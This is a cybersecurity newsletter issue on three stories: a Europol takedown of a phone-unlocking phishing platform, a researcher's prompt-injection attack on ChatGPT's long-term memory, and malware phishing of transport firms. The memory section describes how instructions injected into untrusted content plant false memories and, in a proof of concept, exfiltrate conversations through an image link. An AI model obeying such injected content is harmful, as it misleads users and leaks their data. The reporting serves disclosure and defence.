Europol nets major phishing operation targeting phone credentials

Sep 27 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s rolling like cyber thunder ⚡

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

 Congrats to Google, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

E.T. phone Chrome 👽

 🚨 New Chrome Features Boost Data Control & Security! 🔒

 Google is rolling out new features in Chrome to give users better control over their data and enhance protection against online threats.

The updated Safety Check now runs automatically, revoking site permissions and flagging suspicious notifications in real time. It also warns users about risky Chrome extensions and compromised passwords stored in Google Password Manager. 📱💻

Users can now easily unsubscribe from unwanted notifications on Android and Pixel devices, and grant one-time permissions for camera and mic access, improving privacy management. Stay safe and in control with the latest Chrome update! 🚀🔐

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮 Europol nets major phishing operation targeting phone credentials 📱

  • 👨🏻‍💻 Hackers manipulate your OpenAI history to implant fake memories 🧠

  • 🚢 Transportation companies targeted with Lumma Stealer and NetSupport 🎯

It’s been PhaaSed out ❌❌❌ No catch and release either 🎣

Donald Trump GIF by GIPHY News

Gif by news on Giphy

🚨 Takedown of International Criminal Network Behind Phishing Scheme 🛡️

Law enforcement authorities have successfully dismantled an international criminal network responsible for a phishing-as-a-service (PhaaS) platform known as iServer, which has targeted over 483,000 victims globally. Countries most affected include Chile (77,000), Colombia (70,000), and Ecuador (42,000), among others.

The takedown, called Operation Kaerb, was a joint effort between multiple countries, including Spain, Argentina, Chile, Colombia, and Peru. The operation, which ran from September 10 to 17, led to the arrest of an Argentinian national believed to be the mastermind behind iServer since 2018.

In total, 17 arrests were made, with 28 searches conducted, and over 921 items—including electronic devices, weapons, and mobile phones—were seized. Notably, 1.2 million phones are estimated to have been unlocked by the criminal network to date.

🛒 Phishing-as-a-Service (PhaaS) Platform

iServer was an automated phishing platform specifically designed to harvest credentials to unlock stolen or lost phones, setting it apart from typical phishing operations. The platform offered a web interface that allowed criminals, referred to as "unlockers," to retrieve passwords and user credentials from cloud-based platforms. These credentials were then used to bypass Lost Mode and unlink devices from their rightful owners.

🔗 Phishing Tactics

The attackers sent SMS messages to phone theft victims, tricking them into clicking links that redirected them to phishing landing pages. Victims were asked to enter credentials, device passcodes, and two-factor authentication (2FA) codes, which were then abused to gain full access to the stolen devices.

iServer automated the creation of phishing pages that mimicked popular cloud-based mobile platforms, ensuring its effectiveness as a tool for cybercriminals. This PhaaS platform enabled even low-skilled criminals to participate in these illegal activities.

🙌 Criminal Network Disrupted

In total, 51 suspects have been arrested in connection with Ghost, with notable operations targeting criminals in Australia, Ireland, and Italy. This global crackdown on cybercrime demonstrates how law enforcement agencies are increasingly focused on dismantling organised crime groups that exploit sophisticated technology to commit fraud, theft, and other illegal activities.

The takedown of iServer is another victory in the ongoing battle against cybercriminal networks that use phishing and other methods to unlock stolen devices and compromise sensitive data.

🥡 Takeaway

This high-profile case serves as a reminder of the importance of protecting your devices and accounts from phishing attempts and fraudulent messages. It also underscores the growing threat posed by phishing-as-a-service platforms that empower even less technically skilled criminals to carry out wide-reaching cyberattacks.

Want SOC 2 compliance without the Security Theater?

Question 🤔 does your SOC 2 program feel like Security Theater? Just checking pointless boxes, not actually building security?

In an industry filled with security theater vendors, Oneleet is the only security-first compliance platform that provides an “all in one” solution for SOC 2.

We’ll build you a real-world Security Program, perform the Penetration Test, integrate with a 3rd Party Auditor, and provide the Compliance Software … all within one platform.

Schedule a demo for pricing

Memories, in the corner of AI 🎶🥺💀

🚨 Researcher Exploits ChatGPT Vulnerability to Hijack Long-Term Memory 🛡️

A security researcher named Johann Rehberger recently uncovered a vulnerability in ChatGPT's long-term memory feature, which could allow malicious actors to store false information or inject harmful instructions into the system. Initially reported to OpenAI in May, the issue was labelled as a "safety issue" rather than a security flaw, leading Rehberger to develop a proof-of-concept (PoC) exploit that further demonstrated the potential damage.

📄 ChatGPT's Long-Term Memory Feature

Introduced by OpenAI in February 2024, the long-term memory feature stores details from prior interactions, so ChatGPT can retain context about a user’s preferences, beliefs, or personal details for future use. This enables the AI to have more personalised conversations, but it also introduced vulnerabilities.

🚩 Exploit via Prompt Injection

Rehberger discovered that prompt injections—where malicious instructions are embedded in untrusted content such as emails, websites, or documents—could manipulate ChatGPT's memory, leading it to store and recall false information. He demonstrated how ChatGPT could be tricked into believing a user was "102 years old," lived in a fictional world like the Matrix, or subscribed to beliefs like the Earth being flat. The AI would then use this manipulated information to guide future conversations, potentially over time leading to malicious outcomes.

🔗 Proof-of-Concept: Exfiltrating User Data

In a more advanced demonstration, Rehberger crafted a PoC in which all user input and ChatGPT output could be exfiltrated to an external server by simply having ChatGPT interact with a malicious link. The attack worked by exploiting a flaw in ChatGPT’s macOS app, making it possible to send all input and output to an attacker’s server via a malicious image hosted on a link.

🔨 OpenAI's Response: Partial Fix

OpenAI responded to Rehberger's findings with a partial fix that prevents memory from being abused as a vector for exfiltration. However, the vulnerability remains that prompt injections can still cause ChatGPT’s memory tool to store false or malicious data, even if it no longer leads to data leaks.

⚠️ Ongoing Risks & Precautions

LLM users are advised to be cautious and monitor for signs of new memory additions, especially after interacting with potentially untrusted content. Regularly reviewing stored memories for any unusual or unauthorised entries is crucial to prevent this form of attack. OpenAI provides specific guidance on managing stored memories to minimise risks.

The vulnerability reveals the evolving security challenges associated with AI-driven tools that are designed to enhance personalised user experiences but may open doors for potential exploitation.

🥡 Takeaway

This incident highlights the importance of robust security measures for AI systems like ChatGPT, especially as advanced features like long-term memory become more widely adopted. The case also underscores how prompt injections can introduce persistent threats, making it vital for AI developers and users alike to maintain vigilance against potential vulnerabilities in such emerging technologies.

No problem, I’ll just give the NetSupport desk a ring 💀💀💀

🚨 New Phishing Campaign Targets North American Transportation Companies 🛡️

Transportation and logistics companies in North America are the focus of a phishing campaign that seeks to distribute a variety of malicious software, including information stealers and Remote Access Trojans (RATs).

🔐 Phishing Strategy

According to Proofpoint, the attackers use compromised legitimate email accounts from transportation and shipping companies to inject malicious content into ongoing email conversations. So far, 15 breached email accounts have been identified as being part of this campaign. The method by which these accounts were initially compromised is still unknown, and the identities of the attackers remain unclear.

💻 Delivered Malware

Between May and July 2024, the primary malware distributed included Lumma Stealer, StealC, and NetSupport. However, by August 2024, the attackers modified their tactics. They began using new infrastructure, updated delivery techniques, and included additional malware such as DanaBot and Arechclient2.

📝 Attack Vectors

The phishing emails typically contain attachments like internet shortcut (.URL) files or Google Drive URLs. When these files are launched, they use Server Message Block (SMB) to retrieve the malware payload from a remote server. Additionally, a technique known as ClickFix was used to trick victims into running Base64-encoded PowerShell scripts, initiating the malware infection.

🛑 Targeted Companies & Tactics

The campaign has targeted companies using specific fleet management software, such as Samsara, AMB Logistic, and Astra TMS, indicating that the attackers conduct research on their targets before launching their phishing campaigns. The use of such specific lures suggests that these threat actors may be focused on stealing sensitive data or exploiting vulnerabilities related to logistics and transportation operations.

🛠️ Broader Malware Landscape

This attack comes as new strains of information stealers emerge in the wild, including Angry Stealer, BLX Stealer, and CryptBot-related malware like Yet Another Silly Stealer (YASS). Additionally, a new version of the RomCom RAT, codenamed SnipBot, has been observed in other phishing attacks. This malware allows attackers to execute commands on victim systems, upload/download files, and create archives using 7-Zip.

Though RomCom has been associated with ransomware attacks, recent campaigns suggest a shift toward espionage, particularly with the involvement of the group known as Tropical Scorpius (Void Rabisu).

🥡 Key Takeaway

This phishing campaign is a reminder of the importance of cybersecurity vigilance, particularly in industries like transportation and logistics where compromised systems can lead to significant operational disruptions. As attackers evolve their tactics, businesses must continue to update their security measures and educate employees on phishing risks.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles